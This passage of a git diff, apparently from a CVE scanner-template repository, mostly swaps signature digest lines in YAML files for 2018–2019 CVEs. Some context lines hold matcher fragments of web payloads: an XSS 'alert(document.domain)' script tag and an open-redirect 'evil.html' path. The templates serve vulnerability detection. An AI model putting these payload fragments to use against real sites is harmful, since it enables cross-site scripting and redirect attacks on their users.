4b0a00483046022100e5445cd43372a931c5e0e062098b5481a83f9adeed25b32eda56801674c695e8022100b4e61401bc3a78310c2212d4543b85b61765bf5fea5db8bd265843dfd5809052:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-9845.yaml b/http/cves/2018/CVE-2018-9845.yaml index 49b400f20f..0ce86c2c19 100644 --- a/http/cves/2018/CVE-2018-9845.yaml +++ b/http/cves/2018/CVE-2018-9845.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f3b37fbf3d7baa0052f0bedc5be8a906fa0cf65ae14be825ee7dfd14a4be3dd9022037355a89800c009a2481c471bb0e4406b623c68f11639307aef165aff04bdae2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f7d4856acbd304333d1e35ac28fce5f6f2b891af496158d8d7ac1b843f91fb60022100ef3ccee0f552285a942fe29cd4edb16dfa5d5d19df311e25325db1354f78f83e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-0193.yaml b/http/cves/2019/CVE-2019-0193.yaml index 66a384ae25..33ac5b26fe 100644 --- a/http/cves/2019/CVE-2019-0193.yaml +++ b/http/cves/2019/CVE-2019-0193.yaml @@ -74,4 +74,4 @@ http: regex: - '"name"\:"(.*?)"' internal: true -# digest: 490a0046304402205bcaabde2cb2ce6143465b21d835940f816432250b2f34f593fe713de3f37b6302206c592f558533678f62e8169a0e959bf0717a04b8dbcae72f18caf6ec18da9c9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022007754bdf21d85d0cf45cf267f3ccef7210a4e9ed0b481ad42c82d113b25c5a63022046cdd827fa639e279f5ab759c69cac9293a35163c34b31898f130573ba99f688:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-0221.yaml b/http/cves/2019/CVE-2019-0221.yaml index 06215e719a..0430a66207 100644 --- a/http/cves/2019/CVE-2019-0221.yaml +++ b/http/cves/2019/CVE-2019-0221.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009b5e693d9c11510046258658cf64d0bed4e7e351d300cec6fc9c91b15a218950022072ace8ff86b9cfd8ffea3c1d9bdf57b096a78bd39c40d02f3b238f80500964ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b490d11c0c3f7a69740b3d5d7176b7711ebfb93da6153f1b48c907f591be2be60221009645b1510cc82c91c6f60f7ccddc568f65b69a37a26d16e8ca8bfb3687546da6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-0230.yaml b/http/cves/2019/CVE-2019-0230.yaml index 0d6557d0e7..8d25dc5268 100644 --- a/http/cves/2019/CVE-2019-0230.yaml +++ b/http/cves/2019/CVE-2019-0230.yaml @@ -50,4 +50,4 @@ http: part: body words: - "{{str}}16384" -# digest: 490a0046304402204bf4ab1a8374aeb43f677f37418bc1bd76186cc51614ed4823ee79b554de1622022013657af873e57d6a8cbdb6772fab359e1d83cfa3adcd3cd4b291a06dde328ba2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008d04e965f77b6ac07ee1a0d701ff0b81d9e3abf07d8e5eafc837c3a13bf235d70220668ea9400ee2cd6625358040195788f4c04cb09e26188992fc8727b0cae6670e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-10092.yaml b/http/cves/2019/CVE-2019-10092.yaml index f560fa7e6f..9eaacc6e7c 100644 --- a/http/cves/2019/CVE-2019-10092.yaml +++ b/http/cves/2019/CVE-2019-10092.yaml @@ -41,4 +41,4 @@ http: - type: word words: - "<a href=\"/\\google.com/evil.html\">" -# digest: 4b0a00483046022100fe06ef219910cb21377ede6e43897e9d1ba840a59568b50da8ada8b648d780d4022100d5d67b48a8bfbc03e42ed70988267121fe056df8f26288784a7bef6bb0a65f52:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bfe2eb7f8a4f95d91a420f7ad97b449eb4a6d0f5943939f24271168a88e3a48102202e82f70bff457ab6443cf8b75fcd733564ec1223feacb6d86ba85e98c95a4fc2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-10098.yaml b/http/cves/2019/CVE-2019-10098.yaml index 65128eacf7..8722c85c2d 100644 --- a/http/cves/2019/CVE-2019-10098.yaml +++ b/http/cves/2019/CVE-2019-10098.yaml @@ -44,4 +44,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' -# digest: 4a0a00473045022100e01b48fe0207c14f780bac9919a035df55337e8ca43bba6da5a3d18cd046698202201f46c8762e584f6deab72e836d638c31eb0c298c93ba3e5f0f0e2d6121f8bb75:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a2b2bfd05940a494c1cebf53a5690e24751589d4058daf34b7ba6da7ca847ef402205603b02ddb8c7e3a95da051eb52cf99b5f72439fb656ec42954e72299bdfede0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-1010287.yaml b/http/cves/2019/CVE-2019-1010287.yaml index 0149d63c0d..5021e50e46 100644 --- a/http/cves/2019/CVE-2019-1010287.yaml +++ b/http/cves/2019/CVE-2019-1010287.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008331461fe5689c023156f0e0e5188bbb90235607c16bd5baca78afd485e2d3980221009ea3715183f3a80071b44fc04236b90a25c3911a28fc721b2ad892b87de576ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206d765c6a545284461ef0dc77688376c7a10d0c1391103f1f9cfca1a5e5f2786e02200dc9a3391f5731b15ff643997245961b9e3e528f7d889f38d8bb06fe62d5a991:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-10405.yaml b/http/cves/2019/CVE-2019-10405.yaml index eef7fbedec..c864957a07 100644 --- a/http/cves/2019/CVE-2019-10405.yaml +++ b/http/cves/2019/CVE-2019-10405.yaml @@ -67,4 +67,4 @@ http: - type: kval kval: - x_jenkins -# digest: 4b0a00483046022100f4be7b8a859751b37e854ba92cbebfa38e7ab814389f5b2dd24df7697b7c16e4022100d799b43c6d6ff75cf10ee409dbf6d93a8c3fa0093abebb378d2517eaffc1ee38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a49bb8ed0bca66eb01ecd0fff2e16eb0e40c4c268a893221995b502b049b541d02200f8bf05c7ff23726277cb9bc39cbc3bc3399a37b166bb1df91ca5ce11a7db0b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-10717.yaml b/http/cves/2019/CVE-2019-10717.yaml index 909292b0a2..a768b73f43 100644 --- a/http/cves/2019/CVE-2019-10717.yaml +++ b/http/cves/2019/CVE-2019-10717.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008bc2a6df1ec661a1e058c80095a0bfb21803e5447c6ceb17f9238779c6efbe4902203cb9d1f4f1eaf708d7dd3286ed6feb15b39cf39f9de095868c2341cf5c89b294:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210086bd22735af01bfd411ee905481a3dc6f43f7656c98464c581d7197355312719022100a746f75f698fb3b2dd2130fbfc5d001012bc61a5f8946d5e2c8b2e80abff19fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-10758.yaml b/http/cves/2019/CVE-2019-10758.yaml index 54b91783c0..b7788c3129 100644 --- a/http/cves/2019/CVE-2019-10758.yaml +++ b/http/cves/2019/CVE-2019-10758.yaml @@ -48,4 +48,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4a0a00473045022100a707efd5a953cf498f2407da8a60502b15729c8d513a8cb3e79e4f4f57543a0002206ff1e0d4933305bd33073eb3ca571d6380e0dc8b505e4eaf9d9e0e91e94a231b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100df99f91cbfcabdd1864768d2ea207fa5e852562465d0d1ef8aa408df44647430022100f473c4f58b2eebf2150400c468526c3d78c6a87dc9c8fcdd0173d343e4daeda5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-11248.yaml b/http/cves/2019/CVE-2019-11248.yaml index 25db910825..5e6ab5856e 100644 --- a/http/cves/2019/CVE-2019-11248.yaml +++ b/http/cves/2019/CVE-2019-11248.yaml @@ -49,4 +49,4 @@ http: - "Profile Descriptions" - "goroutine profile: total" condition: or -# digest: 4b0a004830460221008307f1d7a94f3bf164d4fb3a0599e4cf664f8e1c5994402b7151828239d8620c0221009ab7757064a2377254097cea5be5f4f40b96bb2557bdee8b64b829868e174d41:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e657ba9f27d9c568c2277e20ab68f160fd31203471a7943bdb8b24d85ab697de022100cc0aea703272ca6817e298be4071ab1d695c422e53bb5a8c69d213f38f1e8be7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-11370.yaml b/http/cves/2019/CVE-2019-11370.yaml index 2aca65ebaf..a58409b069 100644 --- a/http/cves/2019/CVE-2019-11370.yaml +++ b/http/cves/2019/CVE-2019-11370.yaml @@ -53,4 +53,4 @@ http: - status_code_2 == 200 - contains(body_2, 'value=\"\"><script>alert(document.domain)</script>\"></td>') condition: and -# digest: 4a0a0047304502201c728c57bdcdc9cd92977cc33c30494b57946183df9ea04437e0df5b41638d89022100cffb3e6dd98eaffb837966fd33cdf1421419846ce3a29c12cdaa671e97f80c05:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e4627a99ceecac99db98b1e0914905af8f24b1c540869c2d50d94e33b0c496910220670232e191dd380a2ced69e8cbc66c3332dc83cad8ea2d58e0f7a39a06fbb005:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-11510.yaml b/http/cves/2019/CVE-2019-11510.yaml index 5686a5b6a6..a7b212bfbd 100644 --- a/http/cves/2019/CVE-2019-11510.yaml +++ b/http/cves/2019/CVE-2019-11510.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203cb09d5fcff94c6163b87658b3fdc7e6e18e972e859425a541c521543a2e5f2b022100e5e8e743f385d0126a8f435ef7dd64fdf54130d31f622f09bef068fbfc616479:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200a6513bfa2ef08b29aae2c60a06796d334899ad330d573ea3613c11235c9fc0f02210093e2856202e5d0d79468729930f50b3d43542213215b8d1431d7b2066a6fef97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-11580.yaml b/http/cves/2019/CVE-2019-11580.yaml index 2369be800c..bd8531d698 100644 --- a/http/cves/2019/CVE-2019-11580.yaml +++ b/http/cves/2019/CVE-2019-11580.yaml @@ -57,4 +57,4 @@ http: part: body_2 words: - "CVE-2019-11580" -# digest: 4a0a00473045022041cb8583d3f8e34fbfe33e0f61f16e001d07115f9593dfe40982073ffe5f80b8022100d8bb2eec2234f2e5a9dbc238f7012258efb9b891681e9f41bbe8c3e143cb4201:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f06581bfcfe0b17c53bbd30dd7b7ecd0a167ba619e328b7bee2e94703b40731802203f1e3b285d11fd171b61dfc5977b513cde6e6a75d8c3bc030cc403eec95b2da7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-11581.yaml b/http/cves/2019/CVE-2019-11581.yaml index a8456d0ef5..93f39adac3 100644 --- a/http/cves/2019/CVE-2019-11581.yaml +++ b/http/cves/2019/CVE-2019-11581.yaml @@ -66,4 +66,4 @@ http: - "\\(v8\\.1\\.[0-1]" - "\\(v8\\.2\\.[0-2]" condition: or -# digest: 4a0a00473045022100b5ac1e14381166de97a1fb5d0d4fa2e6d14a5382cf7a596bb2be5dec8b03761202203e1f85de72109b051c2acee04d0edab5ed7a0bb001331179d9357b4cc055e67b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220441b55a42d046c6cc32dac814ac2ea6e7017685fb6daaf7d00f7e3853032a9450220135a23c3bdcb528a225c8375a0508924568b7977fc6b5163fa211428e934266a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-12581.yaml b/http/cves/2019/CVE-2019-12581.yaml index 31a83b5fa4..63953f1c73 100644 --- a/http/cves/2019/CVE-2019-12581.yaml +++ b/http/cves/2019/CVE-2019-12581.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207df5ca90186e8dda1fb2ff710a5b1d4faf3c9698a8d966deed30f42731041cba022100f8e38bd0ce4a0a5cd08d6f26c7b53c4797698bc653e1c271e553f9aba66f650f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220227bc39f0e29587123271b11fb51a1771f772556dbe2e16fcedca6ce1145e1d0022044eccbd11473b67273e8efa4a5380c54ead2423611e481c03e88e725e8a2beb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-12593.yaml b/http/cves/2019/CVE-2019-12593.yaml index 5129fec867..d392e7885a 100644 --- a/http/cves/2019/CVE-2019-12593.yaml +++ b/http/cves/2019/CVE-2019-12593.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100cb5f9fd84b6fb0218b4458e70c04a15e0a75972da3b7226533adf711515f9f3c022028463f9c2412fb63c6ddfef8c71b84042b08c5a1ee379f741f9e27e242df6d51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202177363f6c0dffa62bed56e7e3bbda6a119d55bc8af0204ed2b5e67b50f1ba19022100c28e7286f9e915f1e99af251976cd9fe57be0735149948824d02a55c145137ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-12616.yaml b/http/cves/2019/CVE-2019-12616.yaml index f196816b12..7cbfedfc3e 100644 --- a/http/cves/2019/CVE-2019-12616.yaml +++ b/http/cves/2019/CVE-2019-12616.yaml @@ -72,4 +72,4 @@ http: group: 1 regex: - '\?v=([0-9.]+)' -# digest: 4a0a0047304502201a978d3da6416cf845fa6575bc8896b92b3c928fd8a294c951bc8ace16acef28022100ac39ac8f69ec7f14088bcab163285fa4d9284da85d980928639e63b8e28c252e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f853d2dd0ea4cab7aead99ca58f1f56e4e1d7cfcfca88f15e059977db1ab99610221009302efaf4b299fb928e7082fc13feb5384d3980bbc1c0de911d8b036c160f45a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-12962.yaml b/http/cves/2019/CVE-2019-12962.yaml index 4d0453a4b4..53d2716a7b 100644 --- a/http/cves/2019/CVE-2019-12962.yaml +++ b/http/cves/2019/CVE-2019-12962.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220758d2304b1d699405d3be2d83c3a77d7411cf3cc4eec7a372ee3af9d17db31a6022100bebbb9928d8866af5eee1c336dfc1742c20c210e58b3d8a01e2d77ecdb20a0cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210086323a8c2729158c3926be21092e1e7ab055c717feb677a514fc5213e36578cf022100b6c1b57ba9315341fccf4e14edfb65f4b49a329e43b807e342d7bab7b74dcc6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-12985.yaml b/http/cves/2019/CVE-2019-12985.yaml index ada8b5bb89..f2ca5eac61 100644 --- a/http/cves/2019/CVE-2019-12985.yaml +++ b/http/cves/2019/CVE-2019-12985.yaml @@ -55,4 +55,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 490a0046304402207123b88063bc8e2764d0cf58dc5194e4a6eae09aacc77f1099eddf1e76f77cf2022074d297a3fc44d70f2be3d0d571a0776957ad0a90d4eb104aa3f88238c832edbd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f305e64db4157cdbf190dd04c0a03cb7de6d064837659d1859898c3756d2ea720220493e53075c9567d7640e99af374662cfbe21088a083d1b1fbd5ed8acf332cbfe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-12986.yaml b/http/cves/2019/CVE-2019-12986.yaml index 527e8f032d..5e3b3a50f7 100644 --- a/http/cves/2019/CVE-2019-12986.yaml +++ b/http/cves/2019/CVE-2019-12986.yaml @@ -55,4 +55,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 490a00463044022038de0c0c8b6c31166991b40cb5c2552cfa30480ebe02939ee22118f85b9642740220084c3ccd76fe4098e05901a34cbd4a8bc5c8c22c066135a110ded75f17dbad47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e4a68384c0acdca5d2cf1a92b9d4e8d6bb82bae61d1e3157026d6a3d6b2967bb022100f7fcb85bbbcd712e5008eb0522135ba77b0c88a437e5c8aaedf2fcd6fce29d15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-12987.yaml b/http/cves/2019/CVE-2019-12987.yaml index 9154e3b1f0..2bc23ee14c 100644 --- a/http/cves/2019/CVE-2019-12987.yaml +++ b/http/cves/2019/CVE-2019-12987.yaml @@ -55,4 +55,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4a0a00473045022100d1eda3d9d9c54430c22c449556b1cef412dcc994ef02f327be711ef72d0316a1022050927d61d2e0591a3fdd2609fe475e6bb6cc90724037afc2eeb2e500bcf6a5e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207a02a2f924deeed7148c2e4732ad251b1698a7829e409255a9109d40a4d5218502205692c488bb71919e59828466561e0d79759af163c62bf7a56ac9f9926ecede6e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-12988.yaml b/http/cves/2019/CVE-2019-12988.yaml index 593e3a6d14..a054972fb6 100644 --- a/http/cves/2019/CVE-2019-12988.yaml +++ b/http/cves/2019/CVE-2019-12988.yaml @@ -55,4 +55,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4a0a00473045022100c65b0731bfdc87a270065d149c3b699f09e5e20e70e31a24fe5fbe05b5a149fb02207bdc1cfd101ec33049d00e77bbb0b87c0c053e4a1807abfc5992c61f51b1962a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d8d237b495989562610038e5538435d3f191432d2fa998dadfa3a838b2e587af0220626dda5e055961604d2f45b342773df20d916c4f4ba479a5fdc880a801ab273f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-12990.yaml b/http/cves/2019/CVE-2019-12990.yaml index 1daca6e287..ba7ad24e27 100644 --- a/http/cves/2019/CVE-2019-12990.yaml +++ b/http/cves/2019/CVE-2019-12990.yaml @@ -57,4 +57,4 @@ http: - status_code_3 == 200 - contains(body_1, "<title>Citrix SD-WAN") condition: and -# digest: 4a0a00473045022100df14dd7c2655786918e861da2f04951923b3dd43d59755ed8e90358bfbe41daf0220762adba19e4499f0eaac470404abf44548576795df891a230b0f3c37dc36f3b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022070f44b1dfecb21374d17adff658b1f66fe0a7eaf2f1ab235df3e876773ff3956022100b2005f5e619f1ec63a9ef3fbed456fb615c2937d071bd4fc3e7fa6edc4172c99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-14322.yaml b/http/cves/2019/CVE-2019-14322.yaml index dd8f87ea9e..27812e21b0 100644 --- a/http/cves/2019/CVE-2019-14322.yaml +++ b/http/cves/2019/CVE-2019-14322.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203873fcabe92d5432e4a3a367df497ad11b8075f2c1dfbe3b469969af9114744902205461a9fb6bf86145db766b0dd2935ff057620e015bcb51a43c836a4f4e6291b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cf31c1f9d536390e8983106a7ca1390528768324bec411d8a5b8353dcfe48e56022100989b456e58db370475bec4f6d88e1a9efda788bb46312f58a18cc779d083ccb7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-14470.yaml b/http/cves/2019/CVE-2019-14470.yaml index 0631024a83..af5aa600cc 100644 --- a/http/cves/2019/CVE-2019-14470.yaml +++ b/http/cves/2019/CVE-2019-14470.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203a7456f2586e2ff13b1084e95e44849f1e8b30668bd783df0849405a053880bb022000c29ee77a185f7d060867a2084eebab5c1763b3882345cb38807a8cc663d375:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100db72f8ccd373503e2c788e885daf8551a51541303d74e1b7f57192826dae2b54022100ff0ed7c21434ed918fd5a52fc4e1eda8b84751ee946a590340281c6d37a6b375:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-14530.yaml b/http/cves/2019/CVE-2019-14530.yaml index 870be0ae90..91defa2199 100644 --- a/http/cves/2019/CVE-2019-14530.yaml +++ b/http/cves/2019/CVE-2019-14530.yaml @@ -70,4 +70,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d4130fb1b77b9e6ee1a29b2c6d5479765ab5b0d271d62634e50ba19053b61e6a02207bd80e0f22b1dd469d044b7b50a9930d04015e00b7fc3cb45feed0620ae85673:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a71e0b8eaebc88564339674fb405aac4029bade9ab4d8dbf369bf18520abb2bc02206f4e8a1793daa1f70afc11b78fbe3994eecb254cf404eceeb63f421eb504248b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-14750.yaml b/http/cves/2019/CVE-2019-14750.yaml index b9be2286f8..b700d86114 100644 --- a/http/cves/2019/CVE-2019-14750.yaml +++ b/http/cves/2019/CVE-2019-14750.yaml @@ -96,4 +96,4 @@ http: regex: - '__CSRFToken__" value="(.*?)"' internal: true -# digest: 4a0a00473045022065e66061da2caa14a4e28a20337513d3ed25486793432ac88f25c11f0ecb26b2022100d8c5b725a5ad3584280960a822d372fb3a42dcb18bf179f67d8cd3af94f99995:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009e8fed41fe10fe73f88c6e9c33c05e551a9ae8c27cd19579123f61c99e3b1ccd022100d462b4a0e3cb81c415f2e96382df61ca206ab02ff835b7e4a8ac693a9ce27cee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-14974.yaml b/http/cves/2019/CVE-2019-14974.yaml index bb98ad1047..d2fd2a0efa 100644 --- a/http/cves/2019/CVE-2019-14974.yaml +++ b/http/cves/2019/CVE-2019-14974.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220668bac552ce913a0fc436cba7429eede12ac09c4483d4bbe26286cd5cf2ce1db022039b2d6bb669068335ec43954f445fee03dc63174c5e551ec0d3eb60fdbb90a86:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d611a030c5eaad133b5dbca934bf65224a7d94eb1685c03a81918fa5583ea3840221008519c5c7f8670e1c42364956432400898776eb5b1213d31a0016c2de483ac012:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-15043.yaml b/http/cves/2019/CVE-2019-15043.yaml index 8c0db63399..4e84e992f6 100644 --- a/http/cves/2019/CVE-2019-15043.yaml +++ b/http/cves/2019/CVE-2019-15043.yaml @@ -70,4 +70,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100996dd475afbc8c17aea67c45fd219b94df101afcc7d01ded4b32def1b0639c560220565ec0f9cf6406cb6b878bb65de77bdc3df473eefb82c9b6d454031a2c31319f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100817ecde20d9a1e4f370fe64af96c8819fff7466563ede82546a22586faaf71770221008c38eecd5b26dbe752f9c46e370115b4a0379641320e31ce0e7e019083e576d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-15501.yaml b/http/cves/2019/CVE-2019-15501.yaml index d5d39fcf09..f2c8a08802 100644 --- a/http/cves/2019/CVE-2019-15501.yaml +++ b/http/cves/2019/CVE-2019-15501.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204c4c4762c45efd107e3dc19e37b553089ee3c5ac4bed1ac8dc49218b1e01f26a022043a5c7cd2ec8f5ac2ecfefd526816b8d6a0ae8dd038d7b8b2e56910c36ec6760:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202e156cabd002237086e74dda7399705ff5d49903a594e484e641dbef09fdafe10220443a5b293ee8e84416c088d8676b312f316a4d2063b6b07c7b5d2c99b182c45a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-15642.yaml b/http/cves/2019/CVE-2019-15642.yaml index 5df6421e67..f5810d63d3 100644 --- a/http/cves/2019/CVE-2019-15642.yaml +++ b/http/cves/2019/CVE-2019-15642.yaml @@ -85,4 +85,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b9988b212c5ff3a4d1b56f624dba6eb8bc04332263598e77107cd4549e02fb43022062a1278076d1dd9bef5a95eaebc2def66b8b6f960460ca7e4efe13e13cd5e377:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c0466067e78a43b62e2f2e2ecbbb2b8a093d122b00f05db1e425198b3200145402202a23e8b9d58ae66ec2c03ce04f0d7ca88f0d2e92b4956bdd2ff5b235d74f2b6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-15713.yaml b/http/cves/2019/CVE-2019-15713.yaml index 6527f72473..16107c10c2 100644 --- a/http/cves/2019/CVE-2019-15713.yaml +++ b/http/cves/2019/CVE-2019-15713.yaml @@ -65,4 +65,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220275a5af7802c048a229a91d71441896cd434087781be8487907c3338fccb0b7a02207f404a3a3e7366d8386d69d7566de69f572fc9af15159ecc60b01c1ab14a7c7c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207ac831e6fd7d668e470992e243449de7a90933b03f28ac02c26a358c9919be5c022004a2d509cbd83cf9c5891e7d00d0304471bbac0709569f71936e27971c6ac358:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-15829.yaml b/http/cves/2019/CVE-2019-15829.yaml index 3483882569..b276e66cdb 100644 --- a/http/cves/2019/CVE-2019-15829.yaml +++ b/http/cves/2019/CVE-2019-15829.yaml @@ -51,4 +51,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "post galleries!")' condition: and -# digest: 490a00463044022056a16f056cc58fb006a459c9168517f925edb27a7006189b7da06f91c0dd5be5022062657c2a2ac0ce3b00eb44b4a35b8337040849120130fdbb561263e4e36f81cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220137550dc2b3b93e1d4e9d098fca719732cf3f6ba8a01b17f88ffab99f8bcb96e02202dfa67c0a99887aeffabe6cec4a3c83d84ea32d4b631b9d9ef5d923fe6013f59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-15859.yaml b/http/cves/2019/CVE-2019-15859.yaml index 051ce8f6d5..48828223f6 100644 --- a/http/cves/2019/CVE-2019-15859.yaml +++ b/http/cves/2019/CVE-2019-15859.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220208952e393fa88832d1c72d19611165090abc28af52d0065331c37e218df2b12022100ea5e6bdbecea617d9342d1549b6698a64af424ce6106cbfaabc4d3d5628f1345:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a3c62793ae73b1c39c9a409b387f9ca1d1a75dd986bfbc5f158c79e8e8f037140220651d46bdbbec8f8e47abb9c0c9fb10c01314d5db58824d87d8d3116379aa9c56:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-15889.yaml b/http/cves/2019/CVE-2019-15889.yaml index edee61075c..7826c2d6aa 100644 --- a/http/cves/2019/CVE-2019-15889.yaml +++ b/http/cves/2019/CVE-2019-15889.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 200 -# digest: 